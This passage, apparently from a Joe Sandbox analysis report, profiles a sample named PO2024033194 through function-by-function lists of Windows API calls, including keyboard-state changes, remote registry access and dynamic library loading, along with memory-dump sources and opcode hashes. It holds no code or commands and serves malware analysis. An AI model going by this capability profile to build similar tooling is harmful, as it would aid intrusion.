                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                  • String ID:
                                                                  • API String ID: 2945290962-0
                                                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                  Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 1457242333-0
                                                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                  Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 15295421-0
                                                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                  Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcstok.LIBCMT ref: 004675B2
                                                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                  • _wcscpy.LIBCMT ref: 00467641
                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                  • _wcslen.LIBCMT ref: 00467793
                                                                  • _wcslen.LIBCMT ref: 004677BD
                                                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                  • String ID: X
                                                                  • API String ID: 780548581-3081909835
                                                                  • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                  • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                  • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                  • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                  Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                  • CloseFigure.GDI32(?), ref: 0044751F
                                                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                  • String ID:
                                                                  • API String ID: 4082120231-0
                                                                  • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                  • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                  • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                  • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                  Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                  • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 2027346449-0
                                                                  • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                  • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                  • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                  • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                  Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                  • GetMenu.USER32 ref: 0047A703
                                                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                  • _wcslen.LIBCMT ref: 0047A79E
                                                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3257027151-0
                                                                  • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                  • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                  Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastselect
                                                                  • String ID:
                                                                  • API String ID: 215497628-0
                                                                  • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                  • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                  • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                  • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                  Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0044443B
                                                                  • GetKeyboardState.USER32(?), ref: 00444450
                                                                  • SetKeyboardState.USER32(?), ref: 004444A4
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                  • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                  • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                  • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                  Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00444633
                                                                  • GetKeyboardState.USER32(?), ref: 00444648
                                                                  • SetKeyboardState.USER32(?), ref: 0044469C
                                                                  • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                  Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                  • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                  • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                  • String ID:
                                                                  • API String ID: 2354583917-0
                                                                  • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                  • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                  • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                  • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                  Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                  • String ID: #v
                                                                  • API String ID: 2449869053-554117064
                                                                  • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                  • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                  • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                  • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                  Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                  Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
